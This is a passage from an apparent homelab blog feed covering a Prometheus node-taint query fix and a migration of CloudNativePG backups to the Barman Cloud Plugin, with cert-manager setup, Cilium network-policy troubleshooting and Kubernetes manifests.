</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">unless</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{}<span style="color:#f92672">))</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">/</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">(</span>
</span></span><span style="display:flex;"><span>      kube_node_status_capacity{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">memory</span>&#34;}
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">unless</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> kube_node_spec_taint{}
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">)</span>
</span></span></code></pre></div><p>So I&rsquo;m using the <code>kube_pod_container_resource_requests</code> for the <code>memory</code> resource,
but only for Pods on nodes where there is no taint. Then I divide that by the
memory capacity of all nodes which don&rsquo;t have a taint. I use this approach because the
taints are readily available in the Prometheus data, and my worker nodes are the only
ones without a taint applied to them, so filtering on taints seemed like a sensible way to select them.</p>
<p>What I did not consider: There are a few non-catastrophic taints which Kubernetes
applies, in my case the disk pressure taint. This simply happened because the disks
were getting a bit full on a few worker nodes due to the many node drains and
subsequent reschedules of Pods. So there were a lot more unused images lying
around locally than is normally the case.</p>
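<p>One way to make the query a bit more robust would be to ignore the automatic node condition taints and only filter on taints that are applied on purpose. Roughly like this, as a sketch (the filter would have to replace <code>kube_node_spec_taint{}</code> in both the numerator and the denominator):</p>
<pre tabindex="0"><code># instead of matching any taint at all ...
kube_node_spec_taint{}
# ... ignore the condition taints the kubelet manages, like node.kubernetes.io/disk-pressure
kube_node_spec_taint{key!~&#34;node\\.kubernetes\\.io/.*&#34;}
</code></pre>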
<p>I was quite amused with myself when I realized that I had just spent half an
hour staring at completely the wrong plots. &#x1f601;</p>
<p>And that&rsquo;s it. Here&rsquo;s to hoping that the next Kubernetes update is not interesting
enough to blog about.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating my CNPG backups to the Barman Cloud Plugin</title>
      <link>https://blog.mei-home.net/posts/cnpg-barman-plugin-migration/</link>
      <pubDate>Wed, 10 Sep 2025 20:20:56 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/cnpg-barman-plugin-migration/</guid>
      <description>This went quite nicely</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my <a href="https://cloudnative-pg.io/">CloudNativePG</a> setup to the
Barman Cloud Plugin.</p>
<p>During my migration from Nomad to Kubernetes, I started using CNPG for my database
needs. For more details, have a look at <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">this post</a>.
I configured their backup solution right away. It consists of a component which
runs in the same Pod as the main Postgres and backs up both the Write-Ahead Log (WAL)
and the full database, all while the instance is kept
up and running. Those backups can then be copied to an S3 bucket for long-term storage.</p>
<p>This solution has been part of the main container up to now, but it looks like
the project is aiming for a more plugin-driven architecture, and their first
step was to extract this backup functionality into the <a href="https://cloudnative-pg.io/plugin-barman-cloud/">Barman Cloud Plugin</a>.
I learned about this through an entry in their <a href="https://github.com/cloudnative-pg/cloudnative-pg/releases/tag/v1.26.0">1.26 release notes</a>
back in May. In addition, they also re-organized their operand container images
at the beginning of the year. There are now <a href="https://github.com/cloudnative-pg/postgres-containers/blob/f097385908a5c51cf7fd3b513bc87f8c63b386ee/README.md#image-types">three image types</a>:</p>
<ul>
<li>minimal: Images based on Debian with only the minimum of packages to support CloudNativePG</li>
<li>standard: Minimal image, plus a few tools like PGAudit</li>
<li>system: Equivalent to the old images, but now based on the &ldquo;standard&rdquo; image and with Barman Cloud Backup still integrated</li>
</ul>
<p>As the Readme mentions:</p>
<blockquote>
<p>IMPORTANT: The system images are deprecated and will be removed once in-core support for Barman Cloud in CloudNativePG is phased out. While you can still use them as long as in-core Barman Cloud remains available, you should plan to migrate to either a minimal or standard image together with the Barman Cloud plugin—or adopt another supported backup solution.</p></blockquote>
<p>So at some point soon, running CNPG with backups without also running the
Barman Cloud Plugin will not be possible anymore.</p>
<p>What I&rsquo;m currently missing (or have completely overlooked?) are some instructions
for how to migrate from the system image to either standard or minimal. And I
distinctly remember reading that you cannot just replace the system image with
standard or minimal. But for the life of me, I can&rsquo;t find where I read that at the moment. &#x1f926;</p>
<h2 id="preparations-cert-manager">Preparations: cert-manager</h2>
<p>For the migration, I followed <a href="https://cloudnative-pg.io/plugin-barman-cloud/docs/migration/">the official docs</a>,
and their first step is installing the Barman Cloud Plugin, documented <a href="https://cloudnative-pg.io/plugin-barman-cloud/docs/installation/">here</a>.
The install has one prerequisite, namely that it requires <a href="https://cert-manager.io/">cert-manager</a>.</p>
<p>I&rsquo;ve not been using cert-manager in my Homelab up to now, because I generally
don&rsquo;t need internal certs and my external Let&rsquo;s Encrypt cert is a wildcard cert,
which requires DNS challenges. And my current DNS host does not support any kind
of API to change DNS records, so I can&rsquo;t use cert-manager here either.</p>
<p>But now I needed it. I used <a href="https://github.com/cert-manager/cert-manager/tree/master/deploy/charts/cert-manager">the official Helm chart</a>,
following the installation docs <a href="https://cert-manager.io/docs/installation/helm/">here</a>.</p>
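<p>The install itself is the usual pair of Helm commands; the chart repository is the one from the cert-manager docs, while the release name and namespace are my own choice:</p>
<pre tabindex="0"><code>helm repo add jetstack https://charts.jetstack.io
helm upgrade --install cert-manager jetstack/cert-manager \
  --namespace cert-manager --create-namespace \
  --values values.yaml
</code></pre>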
<p>My <code>values.yaml</code> file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">global</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">commonLables</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">cert-manager</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">crds</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">keep</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">replicaCount</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">enableCertificateOwnerRef</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">512Mi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">webhook</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100Mi</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;--logging-format=json&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">cainjector</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#e6db74">&#34;--logging-format=json&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;--logging-format=json&#34;</span>
</span></span></code></pre></div><p>The limits are likely a bit high, but I like to just run a new app for a bit with
higher limits to gather a few weeks worth of metrics to determine tighter
resource requests/limits.</p>
<p>The deployment went pretty smoothly, and I did not set up any <a href="https://cert-manager.io/docs/configuration/">Issuers</a>,
as the Barman Plugin manifest brings its own self-signed Issuer along, and I do
not intend to use cert-manager for anything else for now.</p>
<p>But later during the Barman Plugin deployment, I got these error messages:</p>
<pre tabindex="0"><code>  Error: 3 errors occurred:
        * Internal error occurred: failed calling webhook &#34;webhook.cert-manager.io&#34;: failed to call webhook: Post &#34;https://cert-manager-webhook.cert-manager.svc:443/validate?timeout=30s&#34;: net/http: request canceled while waiting for conne
ction (Client.Timeout exceeded while awaiting headers)
        * Internal error occurred: failed calling webhook &#34;webhook.cert-manager.io&#34;: failed to call webhook: Post &#34;https://cert-manager-webhook.cert-manager.svc:443/validate?timeout=30s&#34;: net/http: request canceled while waiting for conne
ction (Client.Timeout exceeded while awaiting headers)
        * Internal error occurred: failed calling webhook &#34;webhook.cert-manager.io&#34;: failed to call webhook: Post &#34;https://cert-manager-webhook.cert-manager.svc:443/validate?timeout=30s&#34;: net/http: request canceled while waiting for conne
ction (Client.Timeout exceeded while awaiting headers)
</code></pre><p>This indicated that the kube-apiserver was not able to talk to the webhook
cert-manager installs. I took a quick look into the Cilium firewall logs, as I
was pretty sure that my network policies were wrong.</p>
<p>For that, I first figured out on which host the webhook was running with
this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n cert-manager pods -o wide
</span></span></code></pre></div><p>Next, I needed to find the Cilium Pod responsible for that host:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n kube-system | grep cilium | grep &lt;HOSTNAME&gt;
</span></span></code></pre></div><p>Then I could launch the cilium monitor:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n kube-system exec -ti cilium-smjsx -- cilium monitor --type drop
</span></span></code></pre></div><p>And this was the output:</p>
<pre tabindex="0"><code>xx drop (Policy denied) flow 0x0 to endpoint 2635, ifindex 6, file bpf_lxc.c:2127, , identity remote-node-&gt;2444: 10.8.0.108:38980 -&gt; 10.8.15.207:10250 tcp SYN
</code></pre><p>For info, <code>10.8.15.207</code> was the webhook Pod. The thing is, I thought I had
already set up the network policy for the cert-manager namespace to allow access
from the kube-apiserver:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cert-manager-kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/component</span>: <span style="color:#ae81ff">webhook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">component</span>: <span style="color:#ae81ff">kube-apiserver</span>
</span></span></code></pre></div><p>But that&rsquo;s where the drop message from the Cilium monitor comes into play,
specifically this part:</p>
<pre tabindex="0"><code>identity remote-node-&gt;2444: 10.8.0.108:38980 -&gt; 10.8.15.207:10250
</code></pre><p>First, the identity was not a Pod, but the generic <code>remote-node</code> identity. Checking
the IP, I found that it was the IP of the Cilium host interface for one of my
control plane nodes. Which makes sense, considering that the kube-apiserver runs
on the Host network, not the cluster&rsquo;s Pod network.</p>
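<p>That&rsquo;s easy to confirm by looking at one of the static kube-apiserver Pods, for example:</p>
<pre tabindex="0"><code>kubectl -n kube-system get pod kube-apiserver-firstcp -o jsonpath=&#39;{.spec.hostNetwork}&#39;
# prints: true
</code></pre>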
<p>My next attempt to get the desired network policy setup was to use the
<a href="https://docs.cilium.io/en/stable/security/policy/language/#access-to-from-kube-apiserver">kube-apiserver identity</a>.</p>
<p>But that, similarly, did not work either. An explanation can be found in
<a href="https://github.com/cilium/cilium/issues/27967">this issue</a>. Namely, Cilium defines
the kube-apiserver identity from the endpoints of the <code>kubernetes</code> service in the
<code>default</code> namespace. Which, in my case, were the local network host IPs of my
three control plane nodes, not the IPs of their Cilium host interfaces. And that&rsquo;s
why that approach did not work either.</p>
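<p>The addresses that identity gets derived from can be checked by looking at the endpoints of said service:</p>
<pre tabindex="0"><code>kubectl -n default get endpoints kubernetes
</code></pre>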
<p>What I finally landed on were <a href="https://docs.cilium.io/en/stable/security/policy/language/#node-based">node identities</a>.
The final network policy looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cert-manager-kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/component</span>: <span style="color:#ae81ff">webhook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromNodes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">node-role.kubernetes.io/control-plane</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>It&rsquo;s a bit wider than I would like, as it allows all Pods which communicate
via the host interface to access the webhook. But it&rsquo;s the best I could come up
with.</p>
<h2 id="deploying-barman-cloud-plugin">Deploying Barman Cloud Plugin</h2>
<p>The deployment of the plugin itself is not too involved. The only annoying thing
is that it is only provided as an all-in-one manifest. So I took the different
manifests and transformed them into a proper Helm chart. Again, mostly copy
and paste.</p>
<p>The only issue was: How would I do updates? So in addition to the actual,
separated manifests, I also put the official all-in-one yaml file into my repo.
So when it comes time to update, I only need to overwrite the old manifest and
Git will tell me which parts I would need to update.</p>
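<p>In practice the update workflow is just a download plus a diff, something along these lines (the manifest URL is whatever the plugin&rsquo;s release page lists):</p>
<pre tabindex="0"><code># overwrite the stored copy of the all-in-one manifest with the new release
curl -L -o barman-cloud-plugin-manifest.yaml &lt;URL of the release manifest&gt;
# Git now shows which of my split-out manifests need the same changes
git diff barman-cloud-plugin-manifest.yaml
</code></pre>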
<p>Perhaps not the most elegant solution, but I&rsquo;m pretty sure it will work just
fine.</p>
<p>Now onto the actual migration.</p>
<h2 id="migrating-my-cnpg-clusters">Migrating my CNPG clusters</h2>
<p>The migration itself needed a few manual steps, but was very straightforward
and didn&rsquo;t cause any problems at all. I followed the official docs from <a href="https://cloudnative-pg.io/plugin-barman-cloud/docs/migration/">here</a>.</p>
<p>For an example, let&rsquo;s look at my Wallabag DB, which was the first one I
migrated:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:17.2&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">wallabag</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">wallabag</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      [<span style="color:#ae81ff">...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1.</span><span style="color:#ae81ff">5G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://my-ceph-rook-cluster:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups-s3-secret-wallabag</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups-s3-secret-wallabag</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">barmanObjectStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-cluster</span>
</span></span></code></pre></div><p>Wallabag is not something I use too much - I&rsquo;m really bad at the &ldquo;reading it later&rdquo;
part of &ldquo;Read it later&rdquo;. &#x1f926;
So it was the ideal database to start with, as I could live with it being down
for a little while, should anything go wrong.</p>
<p>As the docs state, the first step is to add the new ObjectStore object:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">barmancloud.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ObjectStore</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-store</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">configuration</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://my-ceph-rook-cluster:80</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups-s3-secret-wallabag</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups-s3-secret-wallabag</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span></code></pre></div><p>This is a verbatim copy of the <code>spec.backup.barmanObjectStore</code> element of the
original <code>Cluster</code> object, plus the <code>spec.backup.retentionPolicy</code>. I then deployed
the chart to create the ObjectStore. On its own, this doesn&rsquo;t do anything yet.</p>
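<p>A quick way to check that the new object actually made it into the cluster (the namespace is the one the Wallabag cluster lives in):</p>
<pre tabindex="0"><code>kubectl -n wallabag get objectstores.barmancloud.cnpg.io
</code></pre>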
<p>The next step is the reconfiguration of the Cluster. For this, I removed the
entire <code>spec.backup:</code> section, and replaced it with a <code>spec.plugins</code> section,
which looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">plugins</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">barman-cloud.cloudnative-pg.io</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">isWALArchiver</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">barmanObjectName</span>: <span style="color:#ae81ff">wallabag-pg-store</span>
</span></span></code></pre></div><p>Note that the <code>plugins[0].parameters.barmanObjectName</code> entry needs to be the
name of the previously created ObjectStore. Then the Helm chart can be deployed
again, and this is where the change happens. CNPG will now restart each of the
Pods for the Wallabag cluster. Each Pod will gain a new <code>plugin-barman-cloud</code>
container, which will run the backup steps from now on.</p>
<p>To verify that the backups were actually working after that, I checked the logs
for the <code>plugin-barman-cloud</code> container with <code>kubectl logs -n wallabag wallabag-pg-cluster-2 -c plugin-barman-cloud</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T09:56:22.497125867Z&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Archived WAL file&#34;</span>,<span style="color:#f92672">&#34;walName&#34;</span>:<span style="color:#e6db74">&#34;/var/lib/postgresql/data/pgdata/pg_wal/0000001A0000000200000019&#34;</span>,<span style="color:#f92672">&#34;startTime&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T09:56:14.33717675Z&#34;</span>,<span style="color:#f92672">&#34;endTime&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T09:56:22.496787018Z&#34;</span>,<span style="color:#f92672">&#34;elapsedWalTime&#34;</span>:<span style="color:#ae81ff">8.159610286</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;wallabag-pg-cluster-2&#34;</span>}
</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T10:01:15.059185561Z&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Executing barman-cloud-wal-archive&#34;</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;wallabag-pg-cluster-2&#34;</span>,<span style="color:#f92672">&#34;walName&#34;</span>:<span style="color:#e6db74">&#34;/var/lib/postgresql/data/pgdata/pg_wal/0000001A000000020000001A&#34;</span>,<span style="color:#f92672">&#34;options&#34;</span>:[<span style="color:#e6db74">&#34;--endpoint-url&#34;</span>,<span style="color:#e6db74">&#34;http://my-ceph-rook-cluster.svc:80&#34;</span>,<span style="color:#e6db74">&#34;--cloud-provider&#34;</span>,<span style="color:#e6db74">&#34;aws-s3&#34;</span>,<span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>,<span style="color:#e6db74">&#34;wallabag-pg-cluster&#34;</span>,<span style="color:#e6db74">&#34;/var/lib/postgresql/data/pgdata/pg_wal/0000001A000000020000001A&#34;</span>]}
